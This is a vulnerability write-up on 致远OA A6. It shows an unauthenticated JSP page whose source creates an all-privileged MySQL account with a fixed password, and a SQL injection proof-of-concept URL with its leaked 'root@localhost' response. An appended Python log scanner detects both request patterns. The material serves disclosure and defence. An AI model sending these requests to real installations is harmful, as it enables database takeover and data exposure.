005-致远OA A6 重置数据库账号密码漏洞.md (1.42 KB, 2021-07-17 00:01:28)
# 致远OA A6 database account password reset vulnerability

### 1. Vulnerability overview

### 2. Affected products

致远OA A6

### 3. Reproduction

Database account password reset page

```bash
http://url/yyoa/ext/byoa/start.jsp
```
    
The code of this file is:

```java
<%
    Connection conn = null;
    PreparedStatement pstmt = null;
    String sql = "create user byoa IDENTIFIED by 'byoa'";
    try {
        conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection();
        pstmt = conn.prepareStatement(sql);
        out.print(pstmt.executeUpdate());
        sql = "grant all on *.* to byoa";
        pstmt = conn.prepareStatement(sql);
        out.println(pstmt.executeUpdate());
        pstmt.close();
        sql = "update mysql.user set password=password('byoa') where user='byoa'";
        pstmt = conn.prepareStatement(sql);
        out.println(pstmt.executeUpdate());
        pstmt.close();
        sql = "flush privileges";
        pstmt = conn.prepareStatement(sql);
        out.print(pstmt.executeUpdate());
        pstmt.close();
        //conn.close();
    } catch (Exception ex) {
        out.println(ex.getMessage());
    }
%>
```

As can be seen, this file performs no permission check at all: it creates the database user byoa, grants it all privileges on *.* and resets its password to byoa for any requester.
    
**MySQL + JSP injection**

```bash
http://url/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp
```

PoC

```bash
http://url/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23
# response: the result of the injected user() is returned in the errors field
{'success':false,'errors':'root@localhost'}
```
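As an added defender-side example (not part of the original writeup), the following Python scans web-server access logs for both request patterns above: any hit on the unauthenticated byoa reset page, and a `user_ids` value on `isNotInTable.jsp` that is not a plain integer list. The log lines are constructed samples; the path constants are the URLs from this page, and the Common Log Format layout is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from any real system); the
# request paths come from this page, everything else is made up.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jul/2021:00:01:28 +0800] "GET /yyoa/ext/byoa/start.jsp HTTP/1.1" 200 3
10.0.0.7 - - [17/Jul/2021:00:02:10 +0800] "GET /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17)%20union%20all%20select%20user()%23 HTTP/1.1" 200 48
10.0.0.9 - - [17/Jul/2021:00:03:00 +0800] "GET /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=17 HTTP/1.1" 200 21
10.0.0.9 - - [17/Jul/2021:00:03:05 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 1024
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Page that creates/resets the byoa database account with no authorisation check:
# any request to it deserves an alert, regardless of parameters.
RESET_PATH = "/yyoa/ext/byoa/start.jsp"
# Page whose user_ids parameter reaches the SQL query unsanitised.
INJECT_PATH = "/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp"
# Expected shape of a legitimate user_ids value: an integer list such as (17) or 17,18
SAFE_IDS_RE = re.compile(r"^\(?\s*\d+(\s*,\s*\d+)*\s*\)?$")
SQL_HINT_RE = re.compile(r"\b(union|select)\b|#|--|/\*", re.IGNORECASE)

def classify(line):
    """Return (client_ip, reason) for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path == RESET_PATH:
        return m.group("ip"), "hit on unauthenticated byoa password-reset page"
    if url.path == INJECT_PATH:
        # parse_qs percent-decodes, so %23 is already '#' here
        for value in parse_qs(url.query, keep_blank_values=True).get("user_ids", []):
            if not SAFE_IDS_RE.match(value) and SQL_HINT_RE.search(value):
                return m.group("ip"), f"SQL injection attempt in user_ids: {value!r}"
    return None

def scan(log_text):
    """Apply classify() to every line and return the list of findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

Blocking the reset page at the reverse proxy and restricting `user_ids` to integers at the application are the corresponding mitigations; the scanner only tells you who already tried.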
    